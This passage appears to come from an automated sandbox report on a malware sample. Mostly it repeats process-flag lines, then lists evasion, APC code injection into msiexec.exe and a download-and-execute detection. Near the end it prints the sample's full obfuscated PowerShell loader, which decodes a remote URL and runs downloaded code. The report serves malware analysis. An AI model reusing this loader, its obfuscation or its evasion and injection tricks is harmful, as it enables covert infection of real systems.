                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Potential evasive VBS script found (sleep loop)
                Source: Initial fileInitial file: Do While Epistolizer.Status = 0 WScript.Sleep 100
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4258Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5666Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7328Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2486Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1448Thread sleep count: 3429 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7752Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7752Thread sleep count: 5556 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7752Thread sleep time: -16668000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 3429 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000003.00000002.1780113469.000001CBB41C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsm
                Source: PING.EXE, 00000001.00000002.1637066361.0000023528B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A48860 LdrInitializeThunk,5_2_04A48860

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_7876.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTR
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitJump to behavior
